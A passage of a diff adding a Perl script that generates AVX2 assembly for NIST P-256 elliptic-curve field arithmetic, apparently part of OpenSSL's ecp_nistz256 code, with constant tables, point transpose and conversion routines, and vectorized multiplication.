+#  S.Gueron and V.Krasnov, "Fast Prime Field Elliptic Curve Cryptography with#
+#                           256 Bit Primes"                                  #
+#                                                                            #
+##############################################################################
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+	$addx = ($1>=2.23);
+}
+
+if (!$addx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+	$addx = ($1>=2.10);
+}
+
+if (!$addx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+	$addx = ($1>=12);
+}
+
+if (!$addx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9])\.([0-9]+)/) {
+	my $ver = $2 + $3/100.0;	# 3.1->3.01, 3.10->3.10
+	$avx = ($ver>=3.0) + ($ver>=3.01);
+	$addx = ($ver>=3.03);
+}
+
+if ($avx>=2) {{
+$digit_size = "\$29";
+$n_digits = "\$9";
+
+$code.=<<___;
+.text
+
+.align 64
+.LAVX2_AND_MASK:
+.LAVX2_POLY:
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x000001ff, 0x000001ff, 0x000001ff, 0x000001ff
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x00040000, 0x00040000, 0x00040000, 0x00040000
+.quad 0x1fe00000, 0x1fe00000, 0x1fe00000, 0x1fe00000
+.quad 0x00ffffff, 0x00ffffff, 0x00ffffff, 0x00ffffff
+
+.LAVX2_POLY_x2:
+.quad 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC
+.quad 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC
+.quad 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC
+.quad 0x400007FC, 0x400007FC, 0x400007FC, 0x400007FC
+.quad 0x3FFFFFFE, 0x3FFFFFFE, 0x3FFFFFFE, 0x3FFFFFFE
+.quad 0x3FFFFFFE, 0x3FFFFFFE, 0x3FFFFFFE, 0x3FFFFFFE
+.quad 0x400FFFFE, 0x400FFFFE, 0x400FFFFE, 0x400FFFFE
+.quad 0x7F7FFFFE, 0x7F7FFFFE, 0x7F7FFFFE, 0x7F7FFFFE
+.quad 0x03FFFFFC, 0x03FFFFFC, 0x03FFFFFC, 0x03FFFFFC
+
+.LAVX2_POLY_x8:
+.quad 0xFFFFFFF8, 0xFFFFFFF8, 0xFFFFFFF8, 0xFFFFFFF8
+.quad 0xFFFFFFF8, 0xFFFFFFF8, 0xFFFFFFF8, 0xFFFFFFF8
+.quad 0xFFFFFFF8, 0xFFFFFFF8, 0xFFFFFFF8, 0xFFFFFFF8
+.quad 0x80000FF8, 0x80000FF8, 0x80000FF8, 0x80000FF8
+.quad 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC
+.quad 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC, 0x7FFFFFFC
+.quad 0x801FFFFC, 0x801FFFFC, 0x801FFFFC, 0x801FFFFC
+.quad 0xFEFFFFFC, 0xFEFFFFFC, 0xFEFFFFFC, 0xFEFFFFFC
+.quad 0x07FFFFF8, 0x07FFFFF8, 0x07FFFFF8, 0x07FFFFF8
+
+.LONE:
+.quad 0x00000020, 0x00000020, 0x00000020, 0x00000020
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x1fffc000, 0x1fffc000, 0x1fffc000, 0x1fffc000
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1f7fffff, 0x1f7fffff, 0x1f7fffff, 0x1f7fffff
+.quad 0x03ffffff, 0x03ffffff, 0x03ffffff, 0x03ffffff
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+
+# RR = 2^266 mod p in AVX2 format, to transform from the native OpenSSL
+# Montgomery form (*2^256) to our format (*2^261)
+
+.LTO_MONT_AVX2:
+.quad 0x00000400, 0x00000400, 0x00000400, 0x00000400
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x1ff80000, 0x1ff80000, 0x1ff80000, 0x1ff80000
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x0fffffff, 0x0fffffff, 0x0fffffff, 0x0fffffff
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x00000003, 0x00000003, 0x00000003, 0x00000003
+
+.LFROM_MONT_AVX2:
+.quad 0x00000001, 0x00000001, 0x00000001, 0x00000001
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+.quad 0x1ffffe00, 0x1ffffe00, 0x1ffffe00, 0x1ffffe00
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1fffffff, 0x1fffffff, 0x1fffffff, 0x1fffffff
+.quad 0x1ffbffff, 0x1ffbffff, 0x1ffbffff, 0x1ffbffff
+.quad 0x001fffff, 0x001fffff, 0x001fffff, 0x001fffff
+.quad 0x00000000, 0x00000000, 0x00000000, 0x00000000
+
+.LIntOne:
+.long 1,1,1,1,1,1,1,1
+___
+
+{
+# This function recieves a pointer to an array of four affine points
+# (X, Y, <1>) and rearanges the data for AVX2 execution, while
+# converting it to 2^29 radix redundant form
+
+my ($X0,$X1,$X2,$X3, $Y0,$Y1,$Y2,$Y3,
+    $T0,$T1,$T2,$T3, $T4,$T5,$T6,$T7)=map("%ymm$_",(0..15));
+
+$code.=<<___;
+.globl	ecp_nistz256_avx2_transpose_convert
+.type	ecp_nistz256_avx2_transpose_convert,\@function,2
+.align 64
+ecp_nistz256_avx2_transpose_convert:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-8-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	# Load the data
+	vmovdqa		32*0(%rsi), $X0
+	lea		112(%rsi), %rax		# size optimization
+	vmovdqa		32*1(%rsi), $Y0
+	lea		.LAVX2_AND_MASK(%rip), %rdx
+	vmovdqa		32*2(%rsi), $X1
+	vmovdqa		32*3(%rsi), $Y1
+	vmovdqa		32*4-112(%rax), $X2
+	vmovdqa		32*5-112(%rax), $Y2
+	vmovdqa		32*6-112(%rax), $X3
+	vmovdqa		32*7-112(%rax), $Y3
+
+	# Transpose X and Y independently
+	vpunpcklqdq	$X1, $X0, $T0		# T0 = [B2 A2 B0 A0]
+	vpunpcklqdq	$X3, $X2, $T1		# T1 = [D2 C2 D0 C0]
+	vpunpckhqdq	$X1, $X0, $T2		# T2 = [B3 A3 B1 A1]
+	vpunpckhqdq	$X3, $X2, $T3		# T3 = [D3 C3 D1 C1]
+
+	vpunpcklqdq	$Y1, $Y0, $T4
+	vpunpcklqdq	$Y3, $Y2, $T5
+	vpunpckhqdq	$Y1, $Y0, $T6
+	vpunpckhqdq	$Y3, $Y2, $T7
+
+	vperm2i128	\$0x20, $T1, $T0, $X0	# X0 = [D0 C0 B0 A0]
+	vperm2i128	\$0x20, $T3, $T2, $X1	# X1 = [D1 C1 B1 A1]
+	vperm2i128	\$0x31, $T1, $T0, $X2	# X2 = [D2 C2 B2 A2]
+	vperm2i128	\$0x31, $T3, $T2, $X3	# X3 = [D3 C3 B3 A3]
+
+	vperm2i128	\$0x20, $T5, $T4, $Y0
+	vperm2i128	\$0x20, $T7, $T6, $Y1
+	vperm2i128	\$0x31, $T5, $T4, $Y2
+	vperm2i128	\$0x31, $T7, $T6, $Y3
+	vmovdqa		(%rdx), $T7
+
+	vpand		(%rdx), $X0, $T0	# out[0] = in[0] & mask;
+	vpsrlq		\$29, $X0, $X0
+	vpand		$T7, $X0, $T1		# out[1] = (in[0] >> shift) & mask;
+	vpsrlq		\$29, $X0, $X0
+	vpsllq		\$6, $X1, $T2
+	vpxor		$X0, $T2, $T2
+	vpand		$T7, $T2, $T2		# out[2] = ((in[0] >> (shift*2)) ^ (in[1] << (64-shift*2))) & mask;
+	vpsrlq		\$23, $X1, $X1
+	vpand		$T7, $X1, $T3		# out[3] = (in[1] >> ((shift*3)%64)) & mask;
+	vpsrlq		\$29, $X1, $X1
+	vpsllq		\$12, $X2, $T4
+	vpxor		$X1, $T4, $T4
+	vpand		$T7, $T4, $T4		# out[4] = ((in[1] >> ((shift*4)%64)) ^ (in[2] << (64*2-shift*4))) & mask;
+	vpsrlq		\$17, $X2, $X2
+	vpand		$T7, $X2, $T5		# out[5] = (in[2] >> ((shift*5)%64)) & mask;
+	vpsrlq		\$29, $X2, $X2
+	vpsllq		\$18, $X3, $T6
+	vpxor		$X2, $T6, $T6
+	vpand		$T7, $T6, $T6		# out[6] = ((in[2] >> ((shift*6)%64)) ^ (in[3] << (64*3-shift*6))) & mask;
+	vpsrlq		\$11, $X3, $X3
+	 vmovdqa	$T0, 32*0(%rdi)
+	 lea		112(%rdi), %rax		# size optimization
+	vpand		$T7, $X3, $T0		# out[7] = (in[3] >> ((shift*7)%64)) & mask;
+	vpsrlq		\$29, $X3, $X3		# out[8] = (in[3] >> ((shift*8)%64)) & mask;
+
+	vmovdqa		$T1, 32*1(%rdi)
+	vmovdqa		$T2, 32*2(%rdi)
+	vmovdqa		$T3, 32*3(%rdi)
+	vmovdqa		$T4, 32*4-112(%rax)
+	vmovdqa		$T5, 32*5-112(%rax)
+	vmovdqa		$T6, 32*6-112(%rax)
+	vmovdqa		$T0, 32*7-112(%rax)
+	vmovdqa		$X3, 32*8-112(%rax)
+	lea		448(%rdi), %rax		# size optimization
+
+	vpand		$T7, $Y0, $T0		# out[0] = in[0] & mask;
+	vpsrlq		\$29, $Y0, $Y0
+	vpand		$T7, $Y0, $T1		# out[1] = (in[0] >> shift) & mask;
+	vpsrlq		\$29, $Y0, $Y0
+	vpsllq		\$6, $Y1, $T2
+	vpxor		$Y0, $T2, $T2
+	vpand		$T7, $T2, $T2		# out[2] = ((in[0] >> (shift*2)) ^ (in[1] << (64-shift*2))) & mask;
+	vpsrlq		\$23, $Y1, $Y1
+	vpand		$T7, $Y1, $T3		# out[3] = (in[1] >> ((shift*3)%64)) & mask;
+	vpsrlq		\$29, $Y1, $Y1
+	vpsllq		\$12, $Y2, $T4
+	vpxor		$Y1, $T4, $T4
+	vpand		$T7, $T4, $T4		# out[4] = ((in[1] >> ((shift*4)%64)) ^ (in[2] << (64*2-shift*4))) & mask;
+	vpsrlq		\$17, $Y2, $Y2
+	vpand		$T7, $Y2, $T5		# out[5] = (in[2] >> ((shift*5)%64)) & mask;
+	vpsrlq		\$29, $Y2, $Y2
+	vpsllq		\$18, $Y3, $T6
+	vpxor		$Y2, $T6, $T6
+	vpand		$T7, $T6, $T6		# out[6] = ((in[2] >> ((shift*6)%64)) ^ (in[3] << (64*3-shift*6))) & mask;
+	vpsrlq		\$11, $Y3, $Y3
+	 vmovdqa	$T0, 32*9-448(%rax)
+	vpand		$T7, $Y3, $T0		# out[7] = (in[3] >> ((shift*7)%64)) & mask;
+	vpsrlq		\$29, $Y3, $Y3		# out[8] = (in[3] >> ((shift*8)%64)) & mask;
+
+	vmovdqa		$T1, 32*10-448(%rax)
+	vmovdqa		$T2, 32*11-448(%rax)
+	vmovdqa		$T3, 32*12-448(%rax)
+	vmovdqa		$T4, 32*13-448(%rax)
+	vmovdqa		$T5, 32*14-448(%rax)
+	vmovdqa		$T6, 32*15-448(%rax)
+	vmovdqa		$T0, 32*16-448(%rax)
+	vmovdqa		$Y3, 32*17-448(%rax)
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	16*0(%rsp), %xmm6
+	movaps	16*1(%rsp), %xmm7
+	movaps	16*2(%rsp), %xmm8
+	movaps	16*3(%rsp), %xmm9
+	movaps	16*4(%rsp), %xmm10
+	movaps	16*5(%rsp), %xmm11
+	movaps	16*6(%rsp), %xmm12
+	movaps	16*7(%rsp), %xmm13
+	movaps	16*8(%rsp), %xmm14
+	movaps	16*9(%rsp), %xmm15
+	lea	8+16*10(%rsp), %rsp
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_transpose_convert,.-ecp_nistz256_avx2_transpose_convert
+___
+}
+{
+################################################################################
+# This function recieves a pointer to an array of four AVX2 formatted points
+# (X, Y, Z) convert the data to normal representation, and rearanges the data
+
+my ($D0,$D1,$D2,$D3, $D4,$D5,$D6,$D7, $D8)=map("%ymm$_",(0..8));
+my ($T0,$T1,$T2,$T3, $T4,$T5,$T6)=map("%ymm$_",(9..15));
+
+$code.=<<___;
+
+.globl	ecp_nistz256_avx2_convert_transpose_back
+.type	ecp_nistz256_avx2_convert_transpose_back,\@function,2
+.align	32
+ecp_nistz256_avx2_convert_transpose_back:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-8-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	mov	\$3, %ecx
+
+.Lconv_loop:
+	vmovdqa		32*0(%rsi), $D0
+	lea		160(%rsi), %rax		# size optimization
+	vmovdqa		32*1(%rsi), $D1
+	vmovdqa		32*2(%rsi), $D2
+	vmovdqa		32*3(%rsi), $D3
+	vmovdqa		32*4-160(%rax), $D4
+	vmovdqa		32*5-160(%rax), $D5
+	vmovdqa		32*6-160(%rax), $D6
+	vmovdqa		32*7-160(%rax), $D7
+	vmovdqa		32*8-160(%rax), $D8
+
+	vpsllq		\$29, $D1, $D1
+	vpsllq		\$58, $D2, $T0
+	vpaddq		$D1, $D0, $D0
+	vpaddq		$T0, $D0, $D0		# out[0] = (in[0]) ^ (in[1] << shift*1) ^ (in[2] << shift*2);
+
+	vpsrlq		\$6, $D2, $D2
+	vpsllq		\$23, $D3, $D3
+	vpsllq		\$52, $D4, $T1
+	vpaddq		$D2, $D3, $D3
+	vpaddq		$D3, $T1, $D1		# out[1] = (in[2] >> (64*1-shift*2)) ^ (in[3] << shift*3%64) ^ (in[4] << shift*4%64);
+
+	vpsrlq		\$12, $D4, $D4
+	vpsllq		\$17, $D5, $D5
+	vpsllq		\$46, $D6, $T2
+	vpaddq		$D4, $D5, $D5
+	vpaddq		$D5, $T2, $D2		# out[2] = (in[4] >> (64*2-shift*4)) ^ (in[5] << shift*5%64) ^ (in[6] << shift*6%64);
+
+	vpsrlq		\$18, $D6, $D6
+	vpsllq		\$11, $D7, $D7
+	vpsllq		\$40, $D8, $T3
+	vpaddq		$D6, $D7, $D7
+	vpaddq		$D7, $T3, $D3		# out[3] = (in[6] >> (64*3-shift*6)) ^ (in[7] << shift*7%64) ^ (in[8] << shift*8%64);
+
+	vpunpcklqdq	$D1, $D0, $T0		# T0 = [B2 A2 B0 A0]
+	vpunpcklqdq	$D3, $D2, $T1		# T1 = [D2 C2 D0 C0]
+	vpunpckhqdq	$D1, $D0, $T2		# T2 = [B3 A3 B1 A1]
+	vpunpckhqdq	$D3, $D2, $T3		# T3 = [D3 C3 D1 C1]
+
+	vperm2i128	\$0x20, $T1, $T0, $D0	# X0 = [D0 C0 B0 A0]
+	vperm2i128	\$0x20, $T3, $T2, $D1	# X1 = [D1 C1 B1 A1]
+	vperm2i128	\$0x31, $T1, $T0, $D2	# X2 = [D2 C2 B2 A2]
+	vperm2i128	\$0x31, $T3, $T2, $D3	# X3 = [D3 C3 B3 A3]
+
+	vmovdqa		$D0, 32*0(%rdi)
+	vmovdqa		$D1, 32*3(%rdi)
+	vmovdqa		$D2, 32*6(%rdi)
+	vmovdqa		$D3, 32*9(%rdi)
+
+	lea		32*9(%rsi), %rsi
+	lea		32*1(%rdi), %rdi
+
+	dec	%ecx
+	jnz	.Lconv_loop
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	16*0(%rsp), %xmm6
+	movaps	16*1(%rsp), %xmm7
+	movaps	16*2(%rsp), %xmm8
+	movaps	16*3(%rsp), %xmm9
+	movaps	16*4(%rsp), %xmm10
+	movaps	16*5(%rsp), %xmm11
+	movaps	16*6(%rsp), %xmm12
+	movaps	16*7(%rsp), %xmm13
+	movaps	16*8(%rsp), %xmm14
+	movaps	16*9(%rsp), %xmm15
+	lea	8+16*10(%rsp), %rsp
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_convert_transpose_back,.-ecp_nistz256_avx2_convert_transpose_back
+___
+}
+{
+my ($r_ptr,$a_ptr,$b_ptr,$itr)=("%rdi","%rsi","%rdx","%ecx");
+my ($ACC0,$ACC1,$ACC2,$ACC3,$ACC4,$ACC5,$ACC6,$ACC7,$ACC8)=map("%ymm$_",(0..8));
+my ($B,$Y,$T0,$AND_MASK,$OVERFLOW)=map("%ymm$_",(9..13));
+
+sub NORMALIZE {
+my $ret=<<___;
+	vpsrlq		$digit_size, $ACC0, $T0
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpaddq		$T0, $ACC1, $ACC1
+
+	vpsrlq		$digit_size, $ACC1, $T0
+	vpand		$AND_MASK, $ACC1, $ACC1
+	vpaddq		$T0, $ACC2, $ACC2
+
+	vpsrlq		$digit_size, $ACC2, $T0
+	vpand		$AND_MASK, $ACC2, $ACC2
+	vpaddq		$T0, $ACC3, $ACC3
+
+	vpsrlq		$digit_size, $ACC3, $T0
+	vpand		$AND_MASK, $ACC3, $ACC3
+	vpaddq		$T0, $ACC4, $ACC4
+
+	vpsrlq		$digit_size, $ACC4, $T0
+	vpand		$AND_MASK, $ACC4, $ACC4
+	vpaddq		$T0, $ACC5, $ACC5
+
+	vpsrlq		$digit_size, $ACC5, $T0
+	vpand		$AND_MASK, $ACC5, $ACC5
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpsrlq		$digit_size, $ACC6, $T0
+	vpand		$AND_MASK, $ACC6, $ACC6
+	vpaddq		$T0, $ACC7, $ACC7
+
+	vpsrlq		$digit_size, $ACC7, $T0
+	vpand		$AND_MASK, $ACC7, $ACC7
+	vpaddq		$T0, $ACC8, $ACC8
+	#vpand		$AND_MASK, $ACC8, $ACC8
+___
+    $ret;
+}
+
+sub STORE {
+my $ret=<<___;
+	vmovdqa		$ACC0, 32*0(%rdi)
+	lea		160(%rdi), %rax		# size optimization
+	vmovdqa		$ACC1, 32*1(%rdi)
+	vmovdqa		$ACC2, 32*2(%rdi)
+	vmovdqa		$ACC3, 32*3(%rdi)
+	vmovdqa		$ACC4, 32*4-160(%rax)
+	vmovdqa		$ACC5, 32*5-160(%rax)
+	vmovdqa		$ACC6, 32*6-160(%rax)
+	vmovdqa		$ACC7, 32*7-160(%rax)
+	vmovdqa		$ACC8, 32*8-160(%rax)
+___
+    $ret;
+}
+
+$code.=<<___;
+.type	avx2_normalize,\@abi-omnipotent
+.align	32
+avx2_normalize:
+	vpsrlq		$digit_size, $ACC0, $T0
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpaddq		$T0, $ACC1, $ACC1
+
+	vpsrlq		$digit_size, $ACC1, $T0
+	vpand		$AND_MASK, $ACC1, $ACC1
+	vpaddq		$T0, $ACC2, $ACC2
+
+	vpsrlq		$digit_size, $ACC2, $T0
+	vpand		$AND_MASK, $ACC2, $ACC2
+	vpaddq		$T0, $ACC3, $ACC3
+
+	vpsrlq		$digit_size, $ACC3, $T0
+	vpand		$AND_MASK, $ACC3, $ACC3
+	vpaddq		$T0, $ACC4, $ACC4
+
+	vpsrlq		$digit_size, $ACC4, $T0
+	vpand		$AND_MASK, $ACC4, $ACC4
+	vpaddq		$T0, $ACC5, $ACC5
+
+	vpsrlq		$digit_size, $ACC5, $T0
+	vpand		$AND_MASK, $ACC5, $ACC5
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpsrlq		$digit_size, $ACC6, $T0
+	vpand		$AND_MASK, $ACC6, $ACC6
+	vpaddq		$T0, $ACC7, $ACC7
+
+	vpsrlq		$digit_size, $ACC7, $T0
+	vpand		$AND_MASK, $ACC7, $ACC7
+	vpaddq		$T0, $ACC8, $ACC8
+	#vpand		$AND_MASK, $ACC8, $ACC8
+
+	ret
+.size	avx2_normalize,.-avx2_normalize
+
+.type	avx2_normalize_n_store,\@abi-omnipotent
+.align	32
+avx2_normalize_n_store:
+	vpsrlq		$digit_size, $ACC0, $T0
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpaddq		$T0, $ACC1, $ACC1
+
+	vpsrlq		$digit_size, $ACC1, $T0
+	vpand		$AND_MASK, $ACC1, $ACC1
+	 vmovdqa	$ACC0, 32*0(%rdi)
+	 lea		160(%rdi), %rax		# size optimization
+	vpaddq		$T0, $ACC2, $ACC2
+
+	vpsrlq		$digit_size, $ACC2, $T0
+	vpand		$AND_MASK, $ACC2, $ACC2
+	 vmovdqa	$ACC1, 32*1(%rdi)
+	vpaddq		$T0, $ACC3, $ACC3
+
+	vpsrlq		$digit_size, $ACC3, $T0
+	vpand		$AND_MASK, $ACC3, $ACC3
+	 vmovdqa	$ACC2, 32*2(%rdi)
+	vpaddq		$T0, $ACC4, $ACC4
+
+	vpsrlq		$digit_size, $ACC4, $T0
+	vpand		$AND_MASK, $ACC4, $ACC4
+	 vmovdqa	$ACC3, 32*3(%rdi)
+	vpaddq		$T0, $ACC5, $ACC5
+
+	vpsrlq		$digit_size, $ACC5, $T0
+	vpand		$AND_MASK, $ACC5, $ACC5
+	 vmovdqa	$ACC4, 32*4-160(%rax)
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpsrlq		$digit_size, $ACC6, $T0
+	vpand		$AND_MASK, $ACC6, $ACC6
+	 vmovdqa	$ACC5, 32*5-160(%rax)
+	vpaddq		$T0, $ACC7, $ACC7
+
+	vpsrlq		$digit_size, $ACC7, $T0
+	vpand		$AND_MASK, $ACC7, $ACC7
+	 vmovdqa	$ACC6, 32*6-160(%rax)
+	vpaddq		$T0, $ACC8, $ACC8
+	#vpand		$AND_MASK, $ACC8, $ACC8
+	 vmovdqa	$ACC7, 32*7-160(%rax)
+	 vmovdqa	$ACC8, 32*8-160(%rax)
+
+	ret
+.size	avx2_normalize_n_store,.-avx2_normalize_n_store
+
+################################################################################
+# void avx2_mul_x4(void* RESULTx4, void *Ax4, void *Bx4);
+.type	avx2_mul_x4,\@abi-omnipotent
+.align	32
+avx2_mul_x4:
+	lea	.LAVX2_POLY(%rip), %rax
+
+	vpxor	$ACC0, $ACC0, $ACC0
+	vpxor	$ACC1, $ACC1, $ACC1
+	vpxor	$ACC2, $ACC2, $ACC2
+	vpxor	$ACC3, $ACC3, $ACC3
+	vpxor	$ACC4, $ACC4, $ACC4
+	vpxor	$ACC5, $ACC5, $ACC5
+	vpxor	$ACC6, $ACC6, $ACC6
+	vpxor	$ACC7, $ACC7, $ACC7
+
+	vmovdqa	32*7(%rax), %ymm14
+	vmovdqa	32*8(%rax), %ymm15
+
+	mov	$n_digits, $itr
+	lea	-512($a_ptr), $a_ptr	# strategic bias to control u-op density
+	jmp	.Lavx2_mul_x4_loop
+
+.align	32
+.Lavx2_mul_x4_loop:
+	vmovdqa		32*0($b_ptr), $B
+	lea		32*1($b_ptr), $b_ptr
+
+	vpmuludq	32*0+512($a_ptr), $B, $T0
+	vpmuludq	32*1+512($a_ptr), $B, $OVERFLOW	# borrow $OVERFLOW
+	vpaddq		$T0, $ACC0, $ACC0
+	vpmuludq	32*2+512($a_ptr), $B, $T0
+	vpaddq		$OVERFLOW, $ACC1, $ACC1
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpmuludq	32*3+512($a_ptr), $B, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC2
+	vpmuludq	32*4+512($a_ptr), $B, $T0
+	vpaddq		$OVERFLOW, $ACC3, $ACC3
+	vpmuludq	32*5+512($a_ptr), $B, $OVERFLOW
+	vpaddq		$T0, $ACC4, $ACC4
+	vpmuludq	32*6+512($a_ptr), $B, $T0
+	vpaddq		$OVERFLOW, $ACC5, $ACC5
+	vpmuludq	32*7+512($a_ptr), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	# Skip some multiplications, optimizing for the constant poly
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*8+512($a_ptr), $B, $ACC8
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	.byte		0x67
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $OVERFLOW
+	.byte		0x67
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $T0
+	vpaddq		$OVERFLOW, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC7, $ACC6
+	vpaddq		$OVERFLOW, $ACC8, $ACC7
+
+	dec	$itr
+	jnz	.Lavx2_mul_x4_loop
+
+	vpxor	$ACC8, $ACC8, $ACC8
+
+	ret
+.size	avx2_mul_x4,.-avx2_mul_x4
+
+# Function optimized for the constant 1
+################################################################################
+# void avx2_mul_by1_x4(void* RESULTx4, void *Ax4);
+.type	avx2_mul_by1_x4,\@abi-omnipotent
+.align	32
+avx2_mul_by1_x4:
+	lea	.LAVX2_POLY(%rip), %rax
+
+	vpxor	$ACC0, $ACC0, $ACC0
+	vpxor	$ACC1, $ACC1, $ACC1
+	vpxor	$ACC2, $ACC2, $ACC2
+	vpxor	$ACC3, $ACC3, $ACC3
+	vpxor	$ACC4, $ACC4, $ACC4
+	vpxor	$ACC5, $ACC5, $ACC5
+	vpxor	$ACC6, $ACC6, $ACC6
+	vpxor	$ACC7, $ACC7, $ACC7
+	vpxor	$ACC8, $ACC8, $ACC8
+
+	vmovdqa	32*3+.LONE(%rip), %ymm14
+	vmovdqa	32*7+.LONE(%rip), %ymm15
+
+	mov	$n_digits, $itr
+	jmp	.Lavx2_mul_by1_x4_loop
+
+.align	32
+.Lavx2_mul_by1_x4_loop:
+	vmovdqa		32*0($a_ptr), $B
+	.byte		0x48,0x8d,0xb6,0x20,0,0,0	# lea	32*1($a_ptr), $a_ptr
+
+	vpsllq		\$5, $B, $OVERFLOW
+	vpmuludq	%ymm14, $B, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC3
+	.byte		0x67
+	vpmuludq	$AND_MASK, $B, $T0
+	vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$T0, $ACC4, $ACC4
+	vpaddq		$T0, $ACC5, $ACC5
+	vpaddq		$T0, $ACC6, $ACC6
+	vpsllq		\$23, $B, $T0
+
+	.byte		0x67,0x67
+	vpmuludq	%ymm15, $B, $OVERFLOW
+	vpsubq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	vpaddq		$OVERFLOW, $ACC7, $ACC7
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	.byte		0x67,0x67
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
